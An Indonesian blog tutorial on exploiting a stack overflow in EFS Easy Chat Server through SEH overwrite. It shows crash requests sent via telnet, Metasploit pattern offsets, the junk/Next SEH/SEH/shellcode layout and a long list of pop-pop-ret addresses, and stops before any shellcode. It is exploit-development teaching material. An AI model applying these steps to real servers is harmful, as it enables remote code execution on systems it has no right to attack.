Posted by kecoak on Jan 31, 2010

SEH Overwrite for n00b

Categories: Bug & Exploit | 4 comments

Baru-baru ini disalah satu forum yang membahas security ada diskusi mengenai SEH overwrite, SEH overwrite merupakan salah satu metode favorite yang umum digunakan untuk meng-eksploitasi aplikasi dalam sistem operasi Microsoft Windows. Dan berhubung ini adalah malam minggu (hey…what’s the correlation??), then let’s talk about this.

Kita tidak akan menceritakan secara detail mengenai apa itu SEH, mungkin akan dibahas pada waktu yang lain, yang pasti SEH (Structure Exception Handle) merupakan salah satu teknologi yang diusung oleh sistem operasi Microsoft Windows dan dapat dimanfaatkan untuk proses eksploitasi suatu bug, khususnya stack based memory corruption. Bisa dibilang SEH overwrite merupakan tehnik yang melibatkan bug aplikasi dilingkungan stack.

Prinsipnya adalah, jika kita bisa membuat suatu aplikasi crash, dan crash tersebut berada di lingkungan stack (contoh: stack-based buffer overflow), dan ketika aplikasi crash ternyata struktur rantai SEH (SEH chain) bisa di-overwrite, maka kemungkinan besar kita bisa mengambil alih sistem dengan memanfaatkan tehnik SEH Overwrite.

Aplikasi yang akan digunakan sebagai target adalah EFS Easy Chat Server, kalian bisa melihat contoh exploitnya disini, dan mendownload aplikasi yang vulnerable-nya disini. Saya ambil contoh aplikasi ini dengan anggapan paling mudah menunjukan proses SEH overwrite pada bug aplikasi tersebut, dan dari hasil percobaan terhadap beberapa sistem operasi (Windows 2000 – Windows XP SP3) menunjukan hasil yang stabil, sehingga cocok untuk dijadikan contoh artikel.

Jika kita lihat beragam exploit jadi untuk aplikasi ini maka semua akan terlihat mudah, untuk itu kita akan beranggapan exploit yang bersifat RCE (Remote Code Execution) belum diketahui. Satu-satunya advisories dan mungkin exploit yang beredar adalah metode DOS, dalam arti server akan crash dan shutdown, seperti contoh exploit ini.

Sebagai informasi, ketika suatu bugs ditemukan maka 2 pihak akan menyatakan bahwa bugs tersebut tidak bisa di-eksploitasi untuk mendapatkan RCE, yaitu vendor (umumnya berhubungan dengan bug sistem operasi) dan pendatang baru di bidang exploitasi. Memang benar tidak semua bug bisa dimanfaatkan untuk mendapatkan shell, namun umumnya ketika suatu bug hanya berakibat DOS berdasarkan PoC (Proof Of Concept) maka berbagai macam hacker akan berusaha agar bug tersebut dapat digunakan untuk gaining RCE. Salah satu contoh adalah ketika tim Immunity berhasil membuat bug pada smb2 yang semula hanya berdampak DOS ternyata bisa di-eksploitasi untuk mendapatkan shell.

Gentleman, start your debugger

Pada contoh exploit DOS diatas, kita tahu bahwa overflow terjadi pada bagian berikut ini:

...
$A=str_repeat('A',999);
...
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1rnHost: $hostrnrn");

Overflow terjadi ketika aplikasi akan memproses fungsi autentifikasi, dalam hal ini akan kita ambil bagian username. Yang artinya, jika kita mengirimkan request diatas dan memasukan sebanyak 999 karakter ‘A’ pada bagian username maka server akan crash. Untuk artikel ini saya akan mengurangi semaksimal mungkin bagian programming, sehingga kita akan mencoba exploitasi secara manual menggunakan program telnet (please, don’t ask me how to use telnet), dan jumlah karakter yang dikirim akan dibatasi menjadi 750 karakter (somehow, terminal yang saya gunakan tidak bisa menerima inputan jika karakter yang dikirimkan sebanyak 999),

$ telnet 172.16.30.129 80
Trying 172.16.30.129...
Connected to 172.16.30.129.
Escape character is '^]'.
GET /chat.ghp?username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&password=1234567&room=1&sex=2 HTTP/1.1
Host:172.16.30.129

Connection closed by foreign host.

Easy Chat Server menerima request pada alamat IP 172.16.30.129, dan ketika request diatas dikirim akan membuat aplikasi crash dan di-terminate oleh Windows. Kondisi ini sering disebut DOS.

Kita akan kirimkan sekali lagi request diatas, namun kali ini dengan kondisi aplikasi easy chat server di monitor menggunakan debugger (attach). Debugger yang saya gunakan untuk contoh kali ini adalah Immunity Debugger,

Kita bisa lihat bahwa crash terjadi pada bagian,

MOV AL, BYTE PTR DS:[EDX]

Register EDX telah di-overwrite oleh deretan karakter ‘A’, sehingga hasil eksekusi tersebut akan mengakibatkan “Access Violation” karena program berusaha membaca lokasi memory DS:[41414141] yang tidak valid,

DS:[41414141]=???
AL=FF

Selanjutnya kita akan mencari tahu apakah struktur SEH chain juga ikut ter-overwrite saat ini,

Good. Langkah selanjutnya adalah mencari tahu 2 hal penting:

1. Berapa byte / karakter yang dibutuhkan untuk membuat aplikasi crash (dalam hal ini karakter yang meng-overwrite register EDX)?
2. Berapa byte / karakter yang dibutuhkan untuk meng-overwrite SEH chain?

Ada beragam cara, namun yang paling mudah adalah menggunakan bantuan metasploit untuk meng-generate karakter serta memanfaatkan plugin immunity debugger dari peter van eechoutte untuk mencari tau lokasi byte diatas (byakugan juga bisa seperti pada post sebelumnya, namun utk kali ini kita pakai immunity debugger 😉 ).

$ ./pattern_create.rb 750
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9

Gunakan tools pattern_create.rb dari metasploit untuk meng-generate deretan karakter unik sebanyak 750 bytes, setelah itu gunakan deretan karakter tersebut untuk mengganti deretan karakter ‘A’ yang sebelumnya dikirimkan ke server,

$ telnet 172.16.30.129 80
Trying 172.16.30.129...
Connected to 172.16.30.129.
Escape character is '^]'.
GET /chat.ghp?username=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9amp;password=1234567&room=1&sex=2 HTTP/1.1
Host:172.16.30.129

Berikut ini hasilnya dari debugger,

Ketika aplikasi crash, kita gunakan plugin “!pvefindaddr findmsp” untuk mencari lokasi deretan karakter metasploit yang dikirimkan diatas keetika meng-overwrite isi stack,

Berikut ini bagian yang memperlihatkan hasil plugin tersebut lebih jelas,

0BADF00D   -------------------------------------------------------------------------
0BADF00D   Searching for metasploit pattern references
0BADF00D   -------------------------------------------------------------------------
0BADF00D   [1] Checking register addresses and contents
0BADF00D   ============================================
0BADF00D   Register EDI is overwritten with Metasploit pattern at position 252
0BADF00D   Register ECX is overwritten with Metasploit pattern at position 256
0BADF00D   [2] Checking seh chain
0BADF00D   ======================
0BADF00D    - Checking seh chain entry at 0x010b6ddc, value 68413368
0BADF00D      => record is overwritten with Metasploit pattern at position 220
0BADF00D   -------------------------------------------------------------------------

Hasil diatas memberikan kita jawaban atas pertanyaan sebelumnya,

1. Register EDI akan di-overwrite setelah 252 karakter. Untuk itu minimal kita harus mengirimkan 252 karakter agar aplikasi crash dan flow program dibawa menuju SEH.
2. SEH record di – overwrite setelah 220 karakter.

Penggunaan istilah “at position” pada plugin peter diatas sebenarnya agak rancu, namun saya asumsikan dia mengambil titik acuan 0, sehingga ketika hasilnya menunjukan “at position 220” itu berarti di-overwrite oleh karakter ke 221 (setelah 220 karakter).

A little bit of theory

Istilah “karakter kesekian” sering disebut sebagai “offset”, untuk itu kita akan menggunakan istilah ini mulai dari sekarang. SEH record di-overwrite oleh offset 221, itu berarti Next SEH di-overwrite pada offset 217. Berikut ini susunan Next SEH dan SEH:

[ Next SEH ] – [ SEH ]

Next SEH dan SEH bernilai 4 byte, sehingga jika kita mengetahui bahwa SEH berada pada offset 221, maka dengan kalkulasi matematika kita tahu bahwa Next SEH dapat di-overwrite oleh offset 217, yang berarti jika kita mengirimkan karakter sebanyak 216, maka 8 karakter berikutnya akan meng-overwrite Next SEH dan SEH.

[Junk * 216] – [Next SEH] – [SEH]

Jika kalian ada yang penasaran dan ingin mencoba dengan hanya mengirimkan 224 karakter untuk melihat hasilnya pada debugger maka akan mendapatkan pelajaran yang sangat penting, yaitu server tidak akan crash. Kenapa? karena offset yang akan meng-overwrite EDX dan membuat aplikasi crash akibat dari “access violation” berada pada offset 253 (lihat kembali hasil pvefinddr diatas). Itu sebabnya jika kita mengirimkan karakter kurang dari 253 maka tidak akan membuat aplikasi crash, dan aplikasi tidak akan dibawa menuju SEH. Oleh sebab itu kita akan membuat aplikasi crash dengan bentuk berikut ini:

[Junk * 216] – [Next SEH] – [SEH] – [Payload/Shellcode]

Kita akan meletakan shellcode setelah SEH. Sehingga alur program akan menjadi berikut ini:

1. Server crash akibat EDX di – overwrite oleh 4 byte karakter yang terdapat pada shellcode (offset 253).
2. Akibat server crash, maka alur program akan dibawa menuju SEH record oleh sistem operasi windows.
3. SEH record akan kita ganti dengan suatu alamat di memory yang berisi opcode “pop, pop, ret”.
4. Alur program (EIP) akan mengeksekusi SEH, namun akibat dari opcode “pop, pop, ret” pada SEH maka EIP akan dibawa menuju Next SEH.
5. Next SEH akan berisi opcode yang menunjuk pada lokasi shellcode, dalam hal ini “jump 6 byte” ke depan.
6. EIP akan mengeksekusi shellcode

Langkah terakhir kita akan mencari lokasi opcode “pop, pop, ret” di memory dari library yang tidak dilindungi oleh /SafeSEH, dan mengisi opcode “jump 6 byte kedepan” pada Next SEH. Untuk lokasi “pop, pop, ret” kita bisa menggunakan kembali plugin “pvefindaddr”,

0BADF00D   [nosafeseh] Getting safeseh status for loaded modules :
0BADF00D   Safeseh unprotected modules :
0BADF00D    * 0x10000000 - 0x10027000 : SSLEAY32.dll
0BADF00D    * 0x00490000 - 0x00561000 : LIBEAY32.dll
0BADF00D    * 0x76fc0000 - 0x76fc6000 : rasadhlp.dll
0BADF00D    * 0x71ad0000 - 0x71ad9000 : WSOCK32.dll
0BADF00D    * 0x00400000 - 0x00489000 : EasyChat.exe
0BADF00D    * 0x77b20000 - 0x77b32000 : MSASN1.dll
0BADF00D    * 0x76fb0000 - 0x76fb8000 : winrnr.dll
0BADF00D
0BADF00D
0BADF00D   --------------------------------------------------------------
0BADF00D   Search for pop pop ret combinations started - please wait...
0BADF00D   --------------------------------------------------------------
0BADF00D   Safeseh unprotected modules :
0BADF00D    * 0x10000000 - 0x10027000 : SSLEAY32.dll
0BADF00D    * 0x00490000 - 0x00561000 : LIBEAY32.dll
0BADF00D    * 0x76fc0000 - 0x76fc6000 : rasadhlp.dll
0BADF00D    * 0x71ad0000 - 0x71ad9000 : WSOCK32.dll
0BADF00D    * 0x00400000 - 0x00489000 : EasyChat.exe
0BADF00D    * 0x77b20000 - 0x77b32000 : MSASN1.dll
0BADF00D    * 0x76fb0000 - 0x76fb8000 : winrnr.dll
0BADF00D   --------------------------------------------------------------
10003D8D   Found pop esi
 pop ebx
 ret at 0x10003d8d [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10003DDA   Found pop esi
 pop ebx
 ret at 0x10003dda [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10003E16   Found pop esi
 pop ebx
 ret at 0x10003e16 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10003E48   Found pop esi
 pop ebx
 ret at 0x10003e48 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10003F04   Found pop esi
 pop ebx
 ret at 0x10003f04 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A0DA   Found pop esi
 pop ebx
 ret at 0x1000a0da [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A0E9   Found pop esi
 pop ebx
 ret at 0x1000a0e9 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A102   Found pop esi
 pop ebx
 ret at 0x1000a102 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A111   Found pop esi
 pop ebx
 ret at 0x1000a111 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A11C   Found pop esi
 pop ebx
 ret at 0x1000a11c [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A14D   Found pop esi
 pop ebx
 ret at 0x1000a14d [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A1B0   Found pop esi
 pop ebx
 ret at 0x1000a1b0 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A23A   Found pop esi
 pop ebx
 ret at 0x1000a23a [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A264   Found pop esi
 pop ebx
 ret at 0x1000a264 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A285   Found pop esi
 pop ebx
 ret at 0x1000a285 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A451   Found pop esi
 pop ebx
 ret at 0x1000a451 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A9AE   Found pop esi
 pop ebx
 ret at 0x1000a9ae [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000AA8E   Found pop esi
 pop ebx
 ret at 0x1000aa8e [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000B594   Found pop esi
 pop ebx
 ret at 0x1000b594 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000CF0C   Found pop esi
 pop ebx
 ret at 0x1000cf0c [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000D1DD   Found pop esi
 pop ebx
 ret at 0x1000d1dd [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000D1E5   Found pop esi
 pop ebx
 ret at 0x1000d1e5 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000EE69   Found pop esi
 pop ebx
 ret at 0x1000ee69 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000EE6F   Found pop esi
 pop ebx
 ret at 0x1000ee6f [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10010BFE   Found pop esi
 pop ebx
 ret at 0x10010bfe [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10010C0C   Found pop esi
 pop ebx
 ret at 0x10010c0c [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012624   Found pop esi
 pop ebx
 ret at 0x10012624 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012632   Found pop esi
 pop ebx
 ret at 0x10012632 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001320B   Found pop esi
 pop ebx
 ret at 0x1001320b [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100133CF   Found pop esi
 pop ebx
 ret at 0x100133cf [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10013470   Found pop esi
 pop ebx
 ret at 0x10013470 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10013800   Found pop esi
 pop ebx
 ret at 0x10013800 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10013814   Found pop esi
 pop ebx
 ret at 0x10013814 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100151B9   Found pop esi
 pop ebx
 ret at 0x100151b9 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100151D0   Found pop esi
 pop ebx
 ret at 0x100151d0 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100153BD   Found pop esi
 pop ebx
 ret at 0x100153bd [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018177   Found pop esi
 pop ebx
 ret at 0x10018177 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100181A0   Found pop esi
 pop ebx
 ret at 0x100181a0 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018C17   Found pop esi
 pop ebx
 ret at 0x10018c17 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018C40   Found pop esi
 pop ebx
 ret at 0x10018c40 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100045E8   Found pop esi
 pop ecx
 ret at 0x100045e8 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10004615   Found pop esi
 pop ecx
 ret at 0x10004615 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10017F21   Found pop esi
 pop ecx
 ret at 0x10017f21 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10017F64   Found pop esi
 pop ecx
 ret at 0x10017f64 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10017FDA   Found pop esi
 pop ecx
 ret at 0x10017fda [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018029   Found pop esi
 pop ecx
 ret at 0x10018029 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018066   Found pop esi
 pop ecx
 ret at 0x10018066 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100189B4   Found pop esi
 pop ecx
 ret at 0x100189b4 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100189FA   Found pop esi
 pop ecx
 ret at 0x100189fa [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018A6D   Found pop esi
 pop ecx
 ret at 0x10018a6d [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018ABF   Found pop esi
 pop ecx
 ret at 0x10018abf [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018AFF   Found pop esi
 pop ecx
 ret at 0x10018aff [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10004228   Found pop esi
 pop edi
 ret at 0x10004228 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100180E7   Found pop esi
 pop edi
 ret at 0x100180e7 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018103   Found pop esi
 pop edi
 ret at 0x10018103 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018777   Found pop esi
 pop edi
 ret at 0x10018777 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018793   Found pop esi
 pop edi
 ret at 0x10018793 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018B8A   Found pop esi
 pop edi
 ret at 0x10018b8a [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018BA6   Found pop esi
 pop edi
 ret at 0x10018ba6 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100190F7   Found pop esi
 pop edi
 ret at 0x100190f7 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10019113   Found pop esi
 pop edi
 ret at 0x10019113 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100052BB   Found pop esi
 pop ebp
 ret at 0x100052bb [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000BFBE   Found pop esi
 pop ebp
 ret at 0x1000bfbe [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100125BD   Found pop esi
 pop ebp
 ret at 0x100125bd [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10009E7A   Found pop edi
 pop esi
 ret at 0x10009e7a [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000A304   Found pop edi
 pop esi
 ret at 0x1000a304 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000AB4B   Found pop edi
 pop esi
 ret at 0x1000ab4b [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000CFCD   Found pop edi
 pop esi
 ret at 0x1000cfcd [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1000D9E8   Found pop edi
 pop esi
 ret at 0x1000d9e8 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100103C0   Found pop edi
 pop esi
 ret at 0x100103c0 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100104BC   Found pop edi
 pop esi
 ret at 0x100104bc [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100107B3   Found pop edi
 pop esi
 ret at 0x100107b3 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10010813   Found pop edi
 pop esi
 ret at 0x10010813 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10010B9A   Found pop edi
 pop esi
 ret at 0x10010b9a [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10010CE5   Found pop edi
 pop esi
 ret at 0x10010ce5 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10010FE7   Found pop edi
 pop esi
 ret at 0x10010fe7 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10011027   Found pop edi
 pop esi
 ret at 0x10011027 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001120F   Found pop edi
 pop esi
 ret at 0x1001120f [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10011232   Found pop edi
 pop esi
 ret at 0x10011232 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100113D8   Found pop edi
 pop esi
 ret at 0x100113d8 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10011484   Found pop edi
 pop esi
 ret at 0x10011484 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001242D   Found pop edi
 pop esi
 ret at 0x1001242d [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001243D   Found pop edi
 pop esi
 ret at 0x1001243d [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001244D   Found pop edi
 pop esi
 ret at 0x1001244d [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012462   Found pop edi
 pop esi
 ret at 0x10012462 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100126F7   Found pop edi
 pop esi
 ret at 0x100126f7 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012728   Found pop edi
 pop esi
 ret at 0x10012728 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012763   Found pop edi
 pop esi
 ret at 0x10012763 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012783   Found pop edi
 pop esi
 ret at 0x10012783 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012825   Found pop edi
 pop esi
 ret at 0x10012825 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100128C1   Found pop edi
 pop esi
 ret at 0x100128c1 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012D41   Found pop edi
 pop esi
 ret at 0x10012d41 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012D98   Found pop edi
 pop esi
 ret at 0x10012d98 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10012DBC   Found pop edi
 pop esi
 ret at 0x10012dbc [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001391C   Found pop edi
 pop esi
 ret at 0x1001391c [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10013934   Found pop edi
 pop esi
 ret at 0x10013934 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10013956   Found pop edi
 pop esi
 ret at 0x10013956 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001399C   Found pop edi
 pop esi
 ret at 0x1001399c [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100139B4   Found pop edi
 pop esi
 ret at 0x100139b4 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100139D6   Found pop edi
 pop esi
 ret at 0x100139d6 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10013F4E   Found pop edi
 pop esi
 ret at 0x10013f4e [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100155D4   Found pop edi
 pop esi
 ret at 0x100155d4 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001580D   Found pop edi
 pop esi
 ret at 0x1001580d [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100168B8   Found pop edi
 pop esi
 ret at 0x100168b8 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10017EC6   Found pop edi
 pop esi
 ret at 0x10017ec6 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10017ED5   Found pop edi
 pop esi
 ret at 0x10017ed5 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001859C   Found pop edi
 pop esi
 ret at 0x1001859c [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100185AB   Found pop edi
 pop esi
 ret at 0x100185ab [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100187EC   Found pop edi
 pop esi
 ret at 0x100187ec [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
100187FB   Found pop edi
 pop esi
 ret at 0x100187fb [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018F1C   Found pop edi
 pop esi
 ret at 0x10018f1c [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
10018F2B   Found pop edi
 pop esi
 ret at 0x10018f2b [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001A329   Found pop edi
 pop esi
 ret at 0x1001a329 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001B295   Found pop edi
 pop esi
 ret at 0x1001b295 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001B2B6   Found pop edi
 pop esi
 ret at 0x1001b2b6 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
1001B2E1   Found pop edi
 pop esi
 ret at 0x1001b2e1 [ssleay32.dll] Access: (PAGE_EXECUTE_READ)
0BADF00D   Search complete
0BADF00D   Output written to ppr.txt
0BADF00D   Found 116 address(es) in non-safeseh protected modules, out of 11418 addresses

Untuk membuat exploit lebih reliable maka kita akan mencari lokasi “pop, pop, ret” dari modul / library bawaan aplikasi EFS Easy Chat Server. Dengan command “!pvefindaddr nosafeseh” kita akan mendapatkan hasil modul-modul yang tidak di-compile dengan /SafeSEH, dan bisa kita lihat bahwa 2 library merupakan bawaan dari Easy Chat Server, yaitu: ssleay32.dll dan libeay32.dll. Sehingga pencarian “pop, pop, ret” bisa kita fokuskan pada library tersebut, ambil contoh utk library ssleay32.dll diatas dengan menggunakan command “!pvefindaddr p esi SSLEAY32.dll”.

